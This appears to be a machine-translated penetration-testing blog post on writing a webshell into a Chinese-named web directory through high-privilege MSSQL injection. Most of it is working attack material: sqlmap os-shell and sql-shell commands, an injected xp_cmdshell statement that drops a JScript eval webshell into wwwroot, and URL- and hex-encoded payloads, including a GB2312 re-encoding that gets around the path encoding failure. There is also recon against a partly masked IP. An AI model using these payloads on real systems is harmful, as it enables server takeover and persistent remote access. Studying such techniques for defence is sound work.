MSSQL high permission injection write horse to Chinese path

0x01 Preface

On the way home from work, I took my mobile phone and looked through it “ Xiaoxiang Xin'an technology exchange group ” Chat record , notice @Bob、@goddemon The two brothers are very interested in the questions mentioned , Just a few days ago, I also tested similar problems for my friends , There is such a local test environment , So when I got home, I helped to test , And wrote this record article , The process was very interesting .

0x02 The target host 1 Problem description

MSSQL High privilege injection , It can be used sqlmap Of os-shell call xp_cmdshell Carry out orders , Station library separation , And the database server is a network disconnector , Through analysis, he guessed that the host may not be able to go out of the network because it does not have a gateway .

So I want to reset the gateway for networking by executing the following command , Then proceed to the next test , However, the implementation failed because there is Chinese in the network connection name of the network card , Write the command to the batch file before executing , Or failure .

netsh int ip set address " Local connection " static 192.168.1.103 255.255.255.0 192.168.1.1

However, we can see from the following figure that there is no problem in writing Chinese characters in the batch file , It is only when reading and executing that Chinese characters are garbled , Finally, the command execution fails , So I guess the problem may be sqlmap.

0x03  The target host 2 Problem description

MSSQL High privilege injection , It can be used sqlmap Of os-shell call xp_cmdshell Carry out orders , It is not the separation of stations and libraries , However, the file cannot be written because there is Chinese in the absolute path of the target website , Tips ： The system could not find the specified path .

sqlmap -u "http://192.168.1.108/sql.aspx?id=1" --os-shell --batch

And this is also a network breaker , Build a local environment , No gateway is set , Therefore, it is not possible to directly use remote downloading and other methods Getshell And access CS/MSF conversation , There is not much to say about the use of the networked environment , Everyone should be able to .

After reading the reason why I can't get out of the Internet , I thought it was the firewall that set the inbound and outbound rules , If it is , We just need to use netsh Command to turn off the firewall , However, it is found that the firewall is not turned on after the command query .

netsh advfirewall show allprofile

This host IP For so and so's private network , Forbid Ping,Nmap belt Pn Parameter scan found only open 80 port , Therefore, it is likely that some equipment has limited the flow at the inlet and outlet , Only... Was released 80 port , But this is just a personal guess , No further verification .

nmap -sV -Pn 210.**.***.159

Good good , More and more far away , Back to the point , I continue to look down ！！！

0x04  Write the horse manually through the browser

Use Google Chrome to execute the following after the injection point SQL Statement to write the horse to the Chinese path , But when you write about horses, you have to put angle brackets <> Pre use ^ To escape , Otherwise, it can not be written in , Tips ： There should not be >.

;exec master..xp_cmdshell 'echo ^<%@ Page Language="Jscript"%^>^<%%eval(Request.Item["xxxasec"],"unsafe");%^> > C:\inetpub\wwwroot\ Chinese test \shell.aspx'--

@5 No. 1 dark area Firefox mentioned in the blog Hackbar The problem of plug-in execution error is also tested , There is no such problem , Guess it may be the coding or plug-in problem of Firefox browser at that time , Pay attention in actual combat .

Brief analysis ：

Why can I write to the Chinese path in the browser ？ Because the browser code is UTF-8, Injecting page code is also UTF-8, Can recognize Chinese characters , And the browser will also give the Chinese path URL(UTF-8) code ,BurpSuite Take a look at packet capture decoding .

Before decoding ：

/sql.aspx?id=1;exec%20master..xp_cmdshell%20%27echo%20^%3C%@%20Page%20Language=%22Jscript%22%^%3E^%3C%%eval(Request.Item[%22xxxasec%22],%22unsafe%22);%^%3E%20%3E%20C:\inetpub\wwwroot\%E4%B8%AD%E6%96%87%E6%B5%8B%E8%AF%95\shell.aspx%27--

After decoding ：

/sql.aspx?id=1;exec master..xp_cmdshell 'echo ^<%@ Page Language="Jscript"%^>^<%%eval(Request.Item["xxxasec"],"unsafe");%^> > C:\inetpub\wwwroot\ Chinese test \shell.aspx'--

notes ： The browser default encoding is UTF-8, If instead GBK Or other codes can not be written to the Chinese path . There are many coding problems that should be paid attention to in penetration testing , Such as ： browser 、 Web page characters 、 database 、 Command terminal code, etc , We often encounter this kind of character garbled due to coding problems , The file cannot be read or written 、 The Chinese echo is garbled .

0x05 sqlmap sql-shell Write horse

Get into sqlmap Of sql-shell Then perform the following SQL Statement can also write the horse to the Chinese path , Why? ？ adopt BurpSuite Packet capturing analysis shows that this is actually the same as the browser ,sqlmap The Chinese path will also be URL(UTF-8) code .

sqlmap -u "http://192.168.1.109/sql.aspx?id=1" --sql-shell --batch --proxy http://127.0.0.1:8080

exec master..xp_cmdshell 'echo ^<%@ Page Language="Jscript"%^>^<%%eval(Request.Item["xxxasec"],"unsafe");%^> > C:\inetpub\wwwroot\ Chinese test \shell1.aspx'

Before decoding ：

/sql.aspx?id=1%3BEXEC%20master..xp_cmdshell%20%27echo%20%5E%3C%25%40%20Page%20Language%3D%22Jscript%22%25%5E%3E%5E%3C%25%25eval%28Request.Item%5B%22xxxasec%22%5D%2C%22unsafe%22%29%3B%25%5E%3E%20%3E%20C%3A%5Cinetpub%5Cwwwroot%5C%E4%B8%AD%E6%96%87%E6%B5%8B%E8%AF%95%5Cshell1.aspx%27--

After decoding ：

/sql.aspx?id=1;EXEC master..xp_cmdshell 'echo ^<%@ Page Language="Jscript"%^>^<%%eval(Request.Item["xxxasec"],"unsafe");%^> > C:\inetpub\wwwroot\ Chinese test \shell1.aspx'--

notes ： What the two brothers met was MSSQL High permission injection in os-shell The command with Chinese characters cannot be executed in , At that time, I found the above two solutions in the local test , But they all said in the actual combat scenes that they did not succeed , It seems that the problem has not been completely solved , This also shows that there are still some differences between local and actual combat , We have to analyze the problem according to the actual situation .

0x06 sqlmap os-shell Write horse

I decided to study it again sqlmap Of os-shell Why can't I execute commands with Chinese characters ？ Continue to use BurpSuite Grab down os-shell Of echo Write horse packets , Executing the command directly will still prompt ： The system could not find the specified path .

sqlmap -u "http://192.168.1.109/sql.aspx?id=1" --os-shell --batch --proxy http://127.0.0.1:8080

echo ^<%@ Page Language="Jscript"%^>^<%%eval(Request.Item["xxxasec"],"unsafe");%^> > C:\inetpub\wwwroot\ Chinese test \shell2.aspx

Before decoding ：

/sql.aspx?id=1%3BDECLARE%20%40clit%20VARCHAR%288000%29%3BSET%20%40clit%3D0x6563686f205e3c25402050616765204c616e67756167653d224a73637269707422255e3e5e3c25256576616c28526571756573742e4974656d5b2278787861736563225d2c22756e7361666522293b255e3e203e20433a5c696e65747075625c777777726f6f745ce4b8ade69687e6b58be8af955c7368656c6c322e61737078%3BINSERT%20INTO%20sqlmapoutput%28data%29%20EXEC%20master..xp_cmdshell%20%40clit--

After decoding ：

/sql.aspx?id=1;DECLARE @clit VARCHAR(8000);SET @clit=0x6563686f205e3c25402050616765204c616e67756167653d224a73637269707422255e3e5e3c25256576616c28526571756573742e4974656d5b2278787861736563225d2c22756e7361666522293b255e3e203e20433a5c696e65747075625c777777726f6f745ce4b8ade69687e6b58be8af955c7368656c6c322e61737078;INSERT INTO sqlmapoutput(data) EXEC master..xp_cmdshell @clit--

Both spaces and symbols have been converted to URL It's encoded , It's really hard to read , You can do it first URL decode , You can see a string in the decoded content HEX(UTF-8) code , The decoded content is what we execute echo Write horse orders .

Before decoding ：

0x6563686f205e3c25402050616765204c616e67756167653d224a73637269707422255e3e5e3c25256576616c28526571756573742e4974656d5b2278787861736563225d2c22756e7361666522293b255e3e203e20433a5c696e65747075625c777777726f6f745ce4b8ade69687e6b58be8af955c7368656c6c322e61737078

After decoding ：

echo ^<%@ Page Language="Jscript"%^>^<%%eval(Request.Item["xxxasec"],"unsafe");%^> > C:\inetpub\wwwroot\ Chinese test \shell2.aspx

because xp_cmdshell Called cmd.exe The command terminal is GBK, So at this time, we need to perform the decoded write horse command again HEX(GB2312) code , then BurpSuite Replace the... In the original packet HEX(UTF-8) Code and then submit .

After the coding ：

6563686F205E3C25402050616765204C616E67756167653D224A73637269707422255E3E5E3C25256576616C28526571756573742E4974656D5B2278787861736563225D2C22756E7361666522293B255E3E203E20433A5C696E65747075625C777777726F6F745CD6D0CEC4B2E2CAD45C7368656C6C322E61737078

At this time, we can see that our horse has been successfully written to the Chinese path , Using this method can perfectly solve the problems encountered by two brothers MSSQL High permission injection in sqlmap Of os-shell Unable to execute commands with Chinese characters in .

0x07  At the end of the paper

Through the research on the problems encountered by the two brothers, it is found that the root cause is the inconsistent coding , As long as the coding problem is solved, it is not a problem , You can learn by yourself UTF-8 and GB2312 Of URL、HEX The difference between the codes .

1、 The browser and sqlmap The default is UTF-8, So I'm submitting SQL Statement is the Chinese path URL The code must also be UTF-8, If you use GB2312 Of URL Coding to submit is definitely not enough , Because the Chinese path is still garbled .

2、sqlmap Medium os-shell The parameter is to use xp_cmdshell adopt cmd.exe Executed command ,cmd and powershell The default code page is 936（ Simplified Chinese GBK）, and sqlmap The default is UTF-8 Submitted packets , So it's messy .

0x08  Reference link

https://forum.90sec.org/thread-9716-1-1.html

https://blog.csdn.net/langkew/article/details/7888242

http://www.voidcn.com/article/p-nnhyesle-bms.html

http://www.dark5.net/blog/2019/06/18/SQLmap Write shell Encountered Chinese path solution set /